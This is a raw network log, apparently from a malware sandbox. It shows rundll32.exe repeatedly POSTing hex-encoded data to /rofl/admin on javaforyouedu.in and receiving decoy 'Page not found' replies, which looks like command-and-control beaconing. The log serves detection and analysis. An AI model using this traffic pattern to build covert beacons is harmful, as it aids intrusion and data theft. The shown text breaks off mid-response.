      2024-08-28 11:37:58 UTC538OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 61 31 37 65 35 63 61 62 39 66 62 36 37 34 37 65 35 63 65 34 64 64 66 62 33 63 32 37 37 61 66 39 62 33 36 35 33 64 66 63 38 65 37 38 34 32 61 36 64 31 39 36 37 31 65 64 30 65 61 35 35 34 39 64 38 39 64 61 35 32 61 33 39 65 61 66 32 65 32 37 30 63 61 35 38 63 35 64 65 65 35 65 37 30 62 33 35 66 66 34 30 34 33 37 63 30 36 35 65 62 36 63 36 62 34 61 63 63 39 39 39 30 65 65 33 66 64 30 62 66 66 30 36 39 31 39 66 64 36 61 36 62 39 64 36 37 63 30 66 30 38 63 38 34 39 39 37 35 34 63 66 34 64 31 39 62 36 65 65 61 66 34 32 34 61 35 37 33 65 63 36 38 65 37 36 63 31 38 32 31 64 30 33 65 66 39 62 35 61 34 63 66 65 61 31 64 31 30 35 39 61 66 63 64 34 35 38 38 33 35 63 34 37
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8a17e5cab9fb6747e5ce4ddfb3c277af9b3653dfc8e7842a6d19671ed0ea5549d89da52a39eaf2e270ca58c5dee5e70b35ff40437c065eb6c6b4acc9990ee3fd0bff06919fd6a6b9d67c0f08c8499754cf4d19b6eeaf424a573ec68e76c1821d03ef9b5a4cfea1d1059afcd458835c47
      2024-08-28 11:37:59 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:37:59 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:37:59 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      1192.168.2.44973143.206.237.1924437396C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:37:58 UTC251OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 538
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:37:58 UTC538OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 61 31 37 65 35 63 61 62 39 66 62 36 37 34 37 65 35 63 65 34 64 64 66 62 33 63 32 37 37 61 66 39 62 33 36 35 33 64 66 63 38 65 37 38 34 32 61 36 64 31 39 36 37 31 65 64 30 65 61 35 35 34 39 64 38 39 64 61 35 32 61 33 39 65 61 66 32 65 32 37 30 63 61 35 38 63 35 64 65 65 35 65 37 30 62 33 35 66 66 34 30 34 33 37 63 30 36 35 65 62 36 63 36 62 34 61 63 63 39 39 39 30 65 65 33 66 64 30 62 66 66 30 36 39 31 39 66 64 36 61 36 62 39 64 36 37 63 30 66 30 38 63 38 34 39 39 37 35 34 63 66 34 64 31 39 62 36 65 65 61 66 34 32 34 61 35 37 33 65 63 36 38 65 37 36 63 31 38 32 31 64 30 33 65 66 39 62 35 61 34 63 66 65 61 31 64 31 30 35 39 61 66 63 64 34 35 38 38 33 35 63 34 37
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8a17e5cab9fb6747e5ce4ddfb3c277af9b3653dfc8e7842a6d19671ed0ea5549d89da52a39eaf2e270ca58c5dee5e70b35ff40437c065eb6c6b4acc9990ee3fd0bff06919fd6a6b9d67c0f08c8499754cf4d19b6eeaf424a573ec68e76c1821d03ef9b5a4cfea1d1059afcd458835c47
      2024-08-28 11:37:59 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:37:58 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:37:59 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      2192.168.2.44973243.206.237.1924437372C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:37:59 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:37:59 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:38:00 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:38:00 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:38:00 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      3192.168.2.44973343.206.237.1924437396C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:37:59 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:37:59 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:38:00 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:38:00 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:38:00 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      4192.168.2.44973443.206.237.1924437500C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:38:01 UTC251OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 538
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:38:01 UTC538OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 61 31 37 65 35 63 61 62 39 66 62 36 37 34 37 65 35 63 65 34 64 64 66 62 33 63 32 37 37 61 66 39 62 33 36 35 33 64 66 63 38 65 37 38 34 32 61 36 64 31 39 36 37 31 65 64 30 65 61 35 35 34 39 64 38 39 64 61 35 32 61 33 39 65 61 66 32 65 32 37 30 63 61 35 38 63 35 64 65 65 35 65 37 30 62 33 35 66 66 34 30 34 33 37 63 30 36 35 65 62 36 63 36 62 34 61 63 63 39 39 39 30 65 65 33 66 64 30 62 66 66 30 36 39 31 39 66 64 36 61 36 62 39 64 36 37 63 30 66 30 38 63 38 34 39 39 37 35 34 63 66 34 64 31 39 62 36 65 65 61 66 34 32 34 61 35 37 33 65 63 36 38 65 37 36 63 31 38 32 31 64 30 33 65 66 39 62 35 61 34 63 66 65 61 31 64 31 30 35 39 61 66 63 64 34 35 38 38 33 35 63 34 37
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8a17e5cab9fb6747e5ce4ddfb3c277af9b3653dfc8e7842a6d19671ed0ea5549d89da52a39eaf2e270ca58c5dee5e70b35ff40437c065eb6c6b4acc9990ee3fd0bff06919fd6a6b9d67c0f08c8499754cf4d19b6eeaf424a573ec68e76c1821d03ef9b5a4cfea1d1059afcd458835c47
      2024-08-28 11:38:01 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:38:01 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:38:01 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      5192.168.2.44973543.206.237.1924437500C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:38:02 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:38:02 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:38:03 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:38:03 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:38:03 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      6192.168.2.44974243.206.237.1924437500C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:38:24 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:38:24 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:38:24 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:38:24 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:38:24 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      7192.168.2.44974443.206.237.1924437396C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:38:30 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:38:30 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:38:31 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:38:31 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:38:31 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      8192.168.2.44974343.206.237.1924437372C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:38:30 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:38:30 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:38:31 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:38:31 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:38:31 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      9192.168.2.44974543.206.237.1924437500C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:38:37 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:38:37 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:38:37 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:38:37 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:38:37 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      10192.168.2.44974743.206.237.1924437500C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:39:00 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:39:00 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:39:00 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:39:00 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:39:00 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      11192.168.2.44974843.206.237.1924437396C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:39:01 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:39:01 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:39:02 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:39:02 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:39:02 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      12192.168.2.44974943.206.237.1924437372C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:39:02 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:39:02 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:39:02 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:39:02 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:39:02 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      13192.168.2.44975043.206.237.1924437500C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:39:16 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:39:16 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:39:17 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:39:16 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:39:17 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      14192.168.2.44975143.206.237.1924437396C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:39:32 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:39:32 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:39:32 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:39:32 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:39:32 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      15192.168.2.44975243.206.237.1924437372C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:39:32 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:39:32 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:39:32 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:39:32 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:39:32 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      16192.168.2.44975343.206.237.1924437500C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:39:47 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:39:47 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:39:47 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:39:47 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:39:47 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      17192.168.2.44975443.206.237.1924437396C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:39:53 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:39:53 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:39:54 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:39:53 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
      Connection: close
      2024-08-28 11:39:54 UTC14INData Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
      Data Ascii: Page not found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      18192.168.2.44975543.206.237.1924437372C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:39:53 UTC250OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 96
      Connection: Keep-Alive
      Cache-Control: no-cache
      2024-08-28 11:39:53 UTC96OUTData Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36
      Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
      2024-08-28 11:39:54 UTC168INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 11:39:54 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 14
      Content-Type: text/plain; charset=utf-8
